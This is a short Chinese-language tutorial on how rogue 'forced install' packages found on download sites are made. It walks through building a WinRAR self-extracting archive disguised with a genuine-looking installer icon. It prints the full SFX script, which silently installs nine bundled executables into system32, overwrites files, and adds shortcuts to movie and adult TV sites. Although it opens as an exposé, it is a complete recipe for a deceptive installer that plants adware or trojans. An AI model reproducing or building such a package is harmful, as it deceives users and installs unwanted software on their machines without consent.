现在有这样一种下载网站,提供的软件是比较实用,但为了经济利益,姑且不谈页面上满天飞的广告,却放上很多下载流氓插件的链接。这些链接与正常的普通链接放在一块儿,用户一不小心就下载了。下载了当然就要安装,这就中了流氓插件的当了,双击的瞬间,一个或几个插件就被安装上了,如果防毒系统不报警,用户就没有任何察觉。
在这里,谈谈这种强制安装的流氓安装程序是怎样制作出来的。
首先,把要安装在用户机器上的插件或是木马放到一个文件夹,这些插件在制作的时候就是后台悄悄安装的。为了测试,我特地下载了这样的安装包。看看下面的图示,cnnic、脱兔等强制安装的插件赫然在列,还有两个“免费电影”网。
全部选中,点击右键,选择“添加到压缩文件(A)”。这样就出现了WinRar的压缩选项框。
点击“创建自解压格式压缩文件”前的小框勾上,再选择“高级”-“自解压选项”-“文本和图标”,进行“浏览”选择好此安装程序的图标,当然这是更好的伪装成真正的安装程序。我们选择了下面这个。
其它的基本可以不用设置了,只需要在“注释”中加入以下参数,然后点击“确定”就可以了。
;下面的注释包含自解压脚本命令
Path=%systemroot%\system32
SavePath
Setup=setup.exe
Setup=cnnic_1007.exe
Setup=NewsSetup10001.exe
Setup=TuoTu_3.0.104_silent_U1202.exe
Setup=tutu_1000.exe
Setup=dodolook510.exe
Setup=Silent.exe
Setup=soft262.exe
Setup=mdodo_Setup.exe
TempMode
Silent=1
Overwrite=1
Shortcut=T, "66免费电影.url", "", "66免费电影", "66免费电影"
Shortcut=D, "在线成人网络电视.url", "", "在线成人网络电视", "在线成人网络电视"
一个完整的安装程序就制作成了。此时只需要双击这个文件,那一堆乱七八遭的东西就被强制安装上了。
